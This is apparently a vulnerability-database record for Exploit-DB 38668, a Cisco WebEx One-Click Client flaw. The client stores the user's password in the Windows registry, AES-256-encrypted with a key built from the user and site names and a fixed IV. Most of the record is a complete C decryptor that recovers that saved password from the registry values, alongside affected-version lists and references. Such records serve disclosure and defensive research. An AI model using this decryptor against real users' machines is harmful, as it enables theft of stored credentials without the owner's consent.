ID

VAR-E-201307-0238


EDB ID

38668


TITLE

Cisco WebEx One-Click Client Password Encryption - Information Disclosure - Windows local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38668

DESCRIPTION

Cisco WebEx One-Click Client Password Encryption - Information Disclosure. Local exploit for the Windows platform.

Trust: 0.6

sources: EXPLOIT-DB: 38668

AFFECTED PRODUCTS

vendor:ciscomodel:webex one-click client password encryptionscope: - version: -

Trust: 1.0

vendor:ciscomodel:webexscope:eqversion:27.10

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:26.49.32

Trust: 0.3

vendor:ciscomodel:webex t27 sp28scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp25 ep3scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp23scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp21 ep9scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp11 ep23scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 ld sp32 cp1scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 ld sp32scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 lc sp25 ep9scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 lc sp25 ep10scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 lb sp21 ep10scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 l sp11 ep26scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 fr20scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t26 sp49 ep40scope: - version: -

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:3.26

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:28.4

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:28.1.0

Trust: 0.3

vendor:ciscomodel:webex 27lc sp22scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex 27lb sp21 ep3scope: - version: -

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.32.2

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.32.10

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.25.11

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.00

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:26.00

Trust: 0.3

sources: BID: 61304 // EXPLOIT-DB: 38668

EXPLOIT

// source: https://www.securityfocus.com/bid/61304/info

Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.

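Successful exploitation may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks. As the listing below shows, the client stores the password under HKEY_CURRENT_USER encrypted with AES-256 in OFB mode, using a key built from the stored user name and site name together with a fixed IV. Every input needed to reverse the encryption therefore sits next to the ciphertext in the same registry hive.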

/*
WebEx One-Click Registry Key Decryptor
brad.antoniewicz@foundstone.coma

compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c

Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography
for making life easy

see comments below

*/

#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

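/*
 * Run AES-256 in OFB mode over `length` bytes of `text` and return the
 * output in a newly allocated buffer.
 *
 * text   - input bytes; `length` bytes are read.
 * length - number of bytes to process; must not be negative.
 * key    - AES key; 32 bytes are read (the key schedule is set up for 256 bits).
 * iv     - initialisation vector; 16 bytes are read. The caller's copy is
 *          left untouched because the cipher works on a private copy.
 *
 * Returns a heap buffer of `length` bytes that the caller must free(), or
 * NULL on a bad argument, allocation failure or key-setup failure.
 * The output is raw bytes and is not NUL-terminated.
 */
unsigned char *
aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv)
{
    unsigned char *outbuf;
    unsigned char liv[16];
    AES_KEY aeskey;
    int num = 0;

    /* A negative length would be converted to a huge size_t below. */
    if (text == NULL || key == NULL || iv == NULL || length < 0) {
        return NULL;
    }

    /* Ask for at least one byte so that NULL always means failure. */
    outbuf = calloc(1, length > 0 ? (size_t)length : 1);
    if (outbuf == NULL) {
        return NULL;
    }

    /* AES_ofb128_encrypt updates the IV in place, so work on a local copy. */
    memcpy(liv, iv, sizeof liv);

    if (AES_set_encrypt_key(key, 256, &aeskey) != 0) {
        free(outbuf);
        return NULL;
    }

    AES_ofb128_encrypt(text, outbuf, (size_t)length, &aeskey, liv, &num);

    return outbuf;
}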

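/*
 * Reverse AES-256 OFB over `length` bytes of `enc` and return the result
 * in a newly allocated buffer.
 *
 * OFB turns the block cipher into a keystream that is XORed with the data,
 * so this routine uses the encryption key schedule and the same
 * AES_ofb128_encrypt call as the encrypt side.
 *
 * enc    - ciphertext bytes; `length` bytes are read.
 * length - number of bytes to process; must not be negative.
 * key    - AES key; 32 bytes are read (the key schedule is set up for 256 bits).
 * iv     - initialisation vector; 16 bytes are read. The caller's copy is
 *          left untouched because the cipher works on a private copy.
 *
 * Returns a heap buffer of `length` bytes that the caller must free(), or
 * NULL on a bad argument, allocation failure or key-setup failure.
 * The output is raw bytes and is not NUL-terminated.
 */
unsigned char *
aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv)
{
    unsigned char *outbuf;
    unsigned char liv[16];
    AES_KEY aeskey;
    int num = 0;

    /* A negative length would be converted to a huge size_t below. */
    if (enc == NULL || key == NULL || iv == NULL || length < 0) {
        return NULL;
    }

    /* Ask for at least one byte so that NULL always means failure. */
    outbuf = calloc(1, length > 0 ? (size_t)length : 1);
    if (outbuf == NULL) {
        return NULL;
    }

    /* AES_ofb128_encrypt updates the IV in place, so work on a local copy. */
    memcpy(liv, iv, sizeof liv);

    if (AES_set_encrypt_key(key, 256, &aeskey) != 0) {
        free(outbuf);
        return NULL;
    }

    AES_ofb128_encrypt(enc, outbuf, (size_t)length, &aeskey, liv, &num);

    return outbuf;
}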
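/*
 * Demonstration driver: encrypts a known sample password and decrypts a
 * sample registry value with the same key and IV, printing both results.
 *
 * Why the scheme is weak, as shown by the values below: the key is built
 * from the user name and site name, the IV is a fixed constant, and all of
 * these inputs are stored under HKEY_CURRENT_USER beside the ciphertext.
 * Nothing secret enters the computation, so the saved password should be
 * treated as recoverable by anything that can read that hive.
 *
 * Returns 0 on success, EXIT_FAILURE if either buffer could not be produced.
 */
int main(void) {
    /*
     * This value is from
     * HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password
     */
    unsigned char regVal[] = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";
    /*
     * This value is from
     * HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen
     */
    int regLength = 12;

    /*
     * This value is a combination of these two registry keys:
     * HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
     * HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName
     *
     * Basically the user name and the site name padded to 32 characters; if
     * the two do not add up to 32 characters, the string is repeated until
     * it fits. The literal is exactly 32 bytes, so the array holds no NUL
     * terminator and must not be used as a C string.
     */
    unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";

    /*
     * The IV is static. With a fixed key and a fixed IV, OFB produces the
     * same keystream every time.
     */
    unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
                             0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };

    /*
     * Known plaintext, used only to check that encrypting it reproduces the
     * registry value above.
     */
    unsigned char password[] = "bradbradbrad";
    int pwLength = (int)strlen((char *)password);

    unsigned char *enc = NULL;
    unsigned char *enc2 = NULL;
    int rc = EXIT_FAILURE;
    int i;

    enc = aes_ofb_encrypt(password, pwLength, key, iv);
    if (enc == NULL) {
        fprintf(stderr, "encryption failed\n");
        goto out;
    }
    printf("Reg Key Value = ");
    for (i = 0; i < pwLength; i++) {
        printf("%02x ", enc[i]);
    }
    printf("\n");

    enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
    if (enc2 == NULL) {
        fprintf(stderr, "decryption failed\n");
        goto out;
    }
    printf("Password = ");
    /* The buffer is not NUL-terminated, so print it byte by byte. */
    for (i = 0; i < regLength; i++) {
        printf("%c", enc2[i]);
    }
    printf("\n");

    rc = 0;

out:
    free(enc2);
    free(enc);
    return rc;
}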

Trust: 1.0

sources: EXPLOIT-DB: 38668

EXPLOIT LANGUAGE

c

Trust: 0.6

sources: EXPLOIT-DB: 38668

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38668

TYPE

Information Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 38668

CREDITS

Brad Antoniewicz

Trust: 0.6

sources: EXPLOIT-DB: 38668

EXTERNAL IDS

db:EXPLOIT-DBid:38668

Trust: 1.9

db:BIDid:61304

Trust: 1.9

db:EDBNETid:59737

Trust: 0.6

sources: BID: 61304 // EXPLOIT-DB: 38668 // EDBNET: 59737

REFERENCES

url:https://www.securityfocus.com/bid/61304/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/38668/

Trust: 0.6

url:http://blog.opensecurityresearch.com/2013/07/quick-reversing-webex-one-click.html

Trust: 0.3

url:https://www.exploit-db.com/exploits/38668

Trust: 0.3

url:http://www.cisco.com/web/products/quad/index.html

Trust: 0.3

url:https://github.com/opensecurityresearch/onedecrypt/

Trust: 0.3

sources: BID: 61304 // EXPLOIT-DB: 38668 // EDBNET: 59737

SOURCES

db:BIDid:61304
db:EXPLOIT-DBid:38668
db:EDBNETid:59737

LAST UPDATE DATE

2022-07-27T09:45:14.168000+00:00


SOURCES UPDATE DATE

db:BIDid:61304date:2013-07-09T00:00:00

SOURCES RELEASE DATE

db:BIDid:61304date:2013-07-09T00:00:00
db:EXPLOIT-DBid:38668date:2013-07-09T00:00:00
db:EDBNETid:59737date:2013-07-09T00:00:00